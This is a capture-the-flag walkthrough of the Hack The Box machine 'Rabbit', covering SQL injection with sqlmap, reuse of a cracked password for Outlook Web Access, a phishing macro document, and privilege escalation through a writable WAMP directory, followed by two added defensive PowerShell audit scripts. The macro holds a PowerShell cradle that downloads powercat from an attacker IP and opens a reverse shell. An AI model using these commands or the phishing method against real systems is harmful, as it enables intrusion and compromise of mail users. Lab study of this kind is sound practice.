Rabbit

Quick Summary

This is one of my favorite boxes. Rabbit is a fairly realistic machine that gives excellent practice in client-side attacks and web application enumeration. What I love about it is the phishing part: building a macro document and getting a shell from it. So let's jump in.

Enumeration

Nmap

Let's start with nmap, which shows a lot of open ports:

sudo nmap -sC -sV -p- 10.10.10.71 --min-rate=5000

[sudo] password for hebo: 
Starting Nmap 7.80 ( https://nmap.org ) at 2020-11-17 21:16 EET
Warning: 10.10.10.71 giving up on port because retransmission cap hit (10).
Nmap scan report for Rabbit.htb.local (10.10.10.71)
Host is up (1.2s latency).
Not shown: 40956 filtered ports, 24555 closed ports
PORT      STATE SERVICE       VERSION
25/tcp    open  smtp          Microsoft Exchange smtpd
| smtp-commands: Rabbit.htb.local Hello [10.10.16.136], SIZE, PIPELINING, DSN, ENHANCEDSTATUSCODES, STARTTLS, X-ANONYMOUSTLS, AUTH NTLM, X-EXPS GSSAPI NTLM, 8BITMIME, BINARYMIME, CHUNKING, XEXCH50, XRDST, XSHADOW, 
|_ This server supports the following commands: HELO EHLO STARTTLS RCPT DATA RSET MAIL QUIT HELP AUTH BDAT 
| smtp-ntlm-info: 
|   Target_Name: HTB
|   NetBIOS_Domain_Name: HTB
|   NetBIOS_Computer_Name: RABBIT
|   DNS_Domain_Name: htb.local
|   DNS_Computer_Name: Rabbit.htb.local
|   DNS_Tree_Name: htb.local
|_  Product_Version: 6.1.7601
53/tcp    open  domain        Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
| dns-nsid: 
|_  bind.version: Microsoft DNS 6.1.7601 (1DB15D39)
80/tcp    open  http          Microsoft IIS httpd 7.5
|_http-server-header: Microsoft-IIS/7.5
|_http-title: 403 - Forbidden: Access is denied.
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2020-11-18 00:22:57Z)
135/tcp   open  msrpc         Microsoft Windows RPC
443/tcp   open  ssl/https?
|_ssl-date: 2020-11-18T00:25:55+00:00; +5h04m10s from scanner time.
| sslv2: 
|   SSLv2 supported
|   ciphers: 
|     SSL2_RC4_128_WITH_MD5
|_    SSL2_DES_192_EDE3_CBC_WITH_MD5
445/tcp   open  microsoft-ds?
587/tcp   open  smtp          Microsoft Exchange smtpd
| smtp-commands: Rabbit.htb.local Hello [10.10.16.136], SIZE 10485760, PIPELINING, DSN, ENHANCEDSTATUSCODES, STARTTLS, AUTH GSSAPI NTLM, 8BITMIME, BINARYMIME, CHUNKING, 
|_ This server supports the following commands: HELO EHLO STARTTLS RCPT DATA RSET MAIL QUIT HELP AUTH BDAT 
| smtp-ntlm-info: 
|   Target_Name: HTB
|   NetBIOS_Domain_Name: HTB
|   NetBIOS_Computer_Name: RABBIT
|   DNS_Domain_Name: htb.local
|   DNS_Computer_Name: Rabbit.htb.local
|   DNS_Tree_Name: htb.local
|_  Product_Version: 6.1.7601
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
808/tcp   open  ccproxy-http?
3306/tcp  open  mysql         MySQL 5.7.19
| mysql-info: 
|   Protocol: 10
|   Version: 5.7.19
|   Thread ID: 11
|   Capabilities flags: 63487
|   Some Capabilities: Speaks41ProtocolOld, ConnectWithDatabase, IgnoreSigpipes, InteractiveClient, Support41Auth, SupportsLoadDataLocal, IgnoreSpaceBeforeParenthesis, SupportsCompression, Speaks41ProtocolNew, DontAllowDatabaseTableColumn, FoundRows, LongPassword, ODBCClient, SupportsTransactions, LongColumnFlag, SupportsMultipleStatments, SupportsMultipleResults, SupportsAuthPlugins
|   Status: Autocommit
|   Salt: }8;4\x18\x0D\x17\x12\x05&\x01\x0E\x1B\x10.s1/\x19%
|_  Auth Plugin Name: mysql_native_password
5722/tcp  open  msrpc         Microsoft Windows RPC
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
6001/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
6003/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
6006/tcp  open  msrpc         Microsoft Windows RPC
6008/tcp  open  msrpc         Microsoft Windows RPC
6144/tcp  open  msrpc         Microsoft Windows RPC
8080/tcp  open  http          Apache httpd 2.4.27 ((Win64) PHP/5.6.31)
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-open-proxy: Proxy might be redirecting requests
|_http-server-header: Apache/2.4.27 (Win64) PHP/5.6.31
|_http-title: Example
28192/tcp open  msrpc         Microsoft Windows RPC
28219/tcp open  msrpc         Microsoft Windows RPC
28274/tcp open  msrpc         Microsoft Windows RPC
28309/tcp open  msrpc         Microsoft Windows RPC
28328/tcp open  msrpc         Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_server_2008:r2:sp1

Host script results:
|_clock-skew: mean: 5h04m09s, deviation: 0s, median: 5h04m09s
|_smb2-time: Protocol negotiation failed (SMB2)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 400.99 seconds

There are a lot of ports and services, so I will start with the web side, since three ports serve HTTP: 80, 443 and 8080. Let's run ffuf to find hidden directories.

ffuf

For HTTPS on port 443:

ffuf -c -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u https://10.10.10.71/FUZZ 
public
exchange
rpc
owa

owa is Outlook Web App, which needs credentials to log in.

Port 8080 gave us some very interesting directories:

cgi-bin
INDEX
icons
%20
joomla
complain
phpmyadmin
%2Acheckout%2A.php
%2Acheckout%2A

I checked Joomla and spent a lot of time on it, but there was nothing there. After reviewing the discovered pages and falling into several rabbit holes, I went to complain, a Complain Management System, which was the odd one out.

SQL Injection

There was a registration form, so I registered as a customer and logged in.

I searched for exploits for Complain Management System, since it looks very old:

searchsploit complain
searchsploit -x php/webapps/42968.txt

I checked all of it, and there was a SQL injection in:

http://10.10.10.71:8080/complain/view.php?mod=admin&view=repod&id=plans
vulnerable parameter --> id

I copied the request to a file using Burp so I could pass it to sqlmap.

sqlmap

sqlmap -r complain.req --dbms mysql --technique=U

To dump the database:

sqlmap -r complain.req --dbms mysql --technique=U --dump

There was nothing interesting, so I used --dbs to find other databases:

sqlmap -r complain.req --dbms mysql --technique=U --dbs

[*] complain
[*] information_schema
[*] joomla
[*] mysql
[*] performance_schema
[*] secret
[*] sys

secret looks interesting, so I dumped it. It contained hashes and I let sqlmap crack them.

When you find passwords on a network, it is worth checking whether they work for other services. Attempting to log in to Outlook Web Access as Ariel is successful.

Foothold

I tried a lot of services, but OWA was the only one where the login was successful:

Ariel:pussycatdolls

I opened all the messages. The administrator asked him to report his weekly TPS and informed him that the security team has deployed Windows Defender and PowerShell Constrained Language Mode as the default organization security standard.

We can bypass this using PowerShell version 2, since Constrained Language Mode is implemented in PowerShell version 5 and the old 2.0 engine does not enforce it. You can read more about this mode here:

https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about_language_modes?view=powershell-6
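From the defender's side, the weak point above is that the legacy 2.0 engine is still installed next to PowerShell 5. The script below is an added example (it is not part of the original writeup) that checks the language mode of the current session, reports whether the 2.0 engine is still present, and lists the engine-start events (Event ID 400 in the classic "Windows PowerShell" log) that were produced by the 2.0 engine. It assumes it is run elevated on Windows 8 / Server 2012 or later, where the 2.0 engine is an optional feature; on the box's own OS (Server 2008 R2) the 2.0 engine is the built-in engine and the optional-feature cmdlets do not apply.

```powershell
# Added example, not from the original writeup.
# Audit the conditions that make "powershell -version 2" a Constrained Language Mode bypass.
# Assumptions: elevated session on Windows 8 / Server 2012 or later with PowerShell 5.

# 1. Which language mode does this session run in? (FullLanguage or ConstrainedLanguage)
"Current session language mode: $($ExecutionContext.SessionState.LanguageMode)"

# 2. Is the legacy 2.0 engine still installed? CLM is enforced by the v5 engine only,
#    so a host that still carries the 2.0 engine can be asked to run outside of CLM.
$v2 = Get-WindowsOptionalFeature -Online -FeatureName MicrosoftPowerShellV2Root -ErrorAction SilentlyContinue
if ($null -eq $v2) {
    Write-Warning 'Could not query the MicrosoftPowerShellV2Root feature (not elevated, or an OS where v2 is the built-in engine).'
}
elseif ($v2.State -eq 'Enabled') {
    Write-Warning 'PowerShell 2.0 engine is installed: "powershell -version 2" bypasses Constrained Language Mode and script block logging.'
    # Remediation (commented out so the audit stays read-only; a reboot may be required):
    # Disable-WindowsOptionalFeature -Online -FeatureName MicrosoftPowerShellV2Root -NoRestart
}
else {
    'PowerShell 2.0 engine is not installed.'
}

# 3. Detection: every engine start writes Event ID 400 to the classic "Windows PowerShell" log.
#    The message carries EngineVersion=<version>, so EngineVersion=2.0 marks use of the old engine.
Get-WinEvent -FilterHashtable @{ LogName = 'Windows PowerShell'; Id = 400 } -ErrorAction SilentlyContinue |
    Where-Object { $_.Message -match 'EngineVersion=2\.0' } |
    Select-Object TimeCreated, MachineName,
        @{ n = 'HostApplication'; e = { if ($_.Message -match 'HostApplication=(.*)') { $Matches[1].Trim() } else { '' } } } |
    Format-Table -AutoSize
```

The HostApplication field shows the command line that started the engine, which is what lets an analyst tell an administrator's legacy script apart from a download cradle like the one used later in this writeup.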

Looks like we are going to run a phishing attack using macros.

Macro

After a lot of searching I found that there is a Metasploit module for making a macro document. The first time I tried to do it with Cobalt Strike, but it didn't work, so I used Metasploit instead:

msf5 > use exploit/multi/misc/openoffice_document_macro
msf5 exploit(multi/misc/openoffice_document_macro) > show options 

We need to edit the macro to get a reverse shell. I renamed the file to .zip so I could edit Basic/Standard/Module1.xml inside it.

I used powercat to get a reverse shell:

https://github.com/besimorhino/powercat
powershell.exe -version 2 IEX (New-Object System.Net.Webclient).DownloadString('http://10.10.xx.xx/powercat.ps1');powercat -c 10.10.xx.xx -p 1234 -e cmd

Then rename the file back to .odt.

Now send it to all users in an email.

After a while we got a shell.

Privilege Escalation

I usually follow these guides for privesc:

https://m0chan.github.io/2019/07/30/Windows-Notes-and-Cheatsheet.html
https://book.hacktricks.xyz/windows/windows-local-privilege-escalation
https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/

I checked the list of processes and their respective owners:

powershell -version 2 -c " & {Get-WmiObject -Query "'Select * from Win32_Process'" | where {$_.Name -notlike "'svchost*'"} | Select Name, Handle, @{Label="'Owner'";Expression={$_.GetOwner().User}} | ft -AutoSize }"

It looks like Apache and MySQL are running as root.

We see that the web service on port 8080 is served by Wamp64. Let's check who is running it and whether we have write permissions on it.

We can write to it, so let's upload our shell.

I used this shell:

https://github.com/artyuum/Simple-PHP-Web-Shell

And we are root.
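The privilege escalation above combines two conditions: a service running as the highest-privileged local account and a directory under its control that low-privileged users can write to. The script below is an added example (not from the original writeup) that audits a host for exactly that combination: it lists services started as LocalSystem and flags those whose executable directory, plus any extra content directories you name (for a WAMP install that would be its web root; the path used here is an assumed placeholder), grant write rights to broad groups. It uses only Get-WmiObject and Get-Acl, so it runs on PowerShell 2 through 5.

```powershell
# Added example, not from the original writeup.
# Find services running as LocalSystem whose binary directory (or a named content
# directory) is writable by broad, low-privileged groups.
# Assumption: the caller can read the ACLs of the directories in question.

# Extra directories to check regardless of which service owns them
# (placeholder path: adjust to the real web root of the host being audited).
$extraDirs = @('C:\wamp64\www')

# Principals that should never hold write rights on a SYSTEM service's files.
$broad = @('Everyone', 'BUILTIN\Users', 'NT AUTHORITY\Authenticated Users', 'NT AUTHORITY\INTERACTIVE')

# Rights that allow modifying or replacing content in the directory.
$writeMask = [System.Security.AccessControl.FileSystemRights]'WriteData, AppendData, WriteAttributes, WriteExtendedAttributes, Delete, ChangePermissions, TakeOwnership'

function Get-BroadWriters([string]$dir) {
    # Return the broad principals that are allowed any of the write rights on $dir.
    if (-not (Test-Path -LiteralPath $dir)) { return @() }
    $acl = Get-Acl -LiteralPath $dir
    $acl.Access |
        Where-Object {
            $_.AccessControlType -eq 'Allow' -and
            $broad -contains $_.IdentityReference.Value -and
            (([int]$_.FileSystemRights) -band ([int]$writeMask)) -ne 0
        } |
        ForEach-Object { $_.IdentityReference.Value } |
        Sort-Object -Unique
}

$findings = @()

Get-WmiObject Win32_Service |
    Where-Object { $_.StartName -eq 'LocalSystem' -and $_.PathName } |
    ForEach-Object {
        # PathName may be quoted and may carry arguments; keep only the executable path.
        $exe = if ($_.PathName -match '^"([^"]+)"') { $Matches[1] } else { ($_.PathName -split '\s+')[0] }
        $dir = Split-Path -Parent $exe
        $writers = Get-BroadWriters $dir
        if ($writers) {
            $findings += New-Object PSObject -Property @{
                Service    = $_.Name
                RunsAs     = $_.StartName
                Directory  = $dir
                WritableBy = ($writers -join ', ')
            }
        }
    }

foreach ($dir in $extraDirs) {
    $writers = Get-BroadWriters $dir
    if ($writers) {
        $findings += New-Object PSObject -Property @{
            Service    = '(content directory)'
            RunsAs     = 'n/a'
            Directory  = $dir
            WritableBy = ($writers -join ', ')
        }
    }
}

$findings | Select-Object Service, RunsAs, Directory, WritableBy | Format-Table -AutoSize
```

Any row in the output is a path where a low-privileged account can drop or replace a file that a SYSTEM process will execute or serve; the fix is to run the service under a dedicated low-privileged account and to remove the broad write entries from the directory ACL.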

Last updated 4 years ago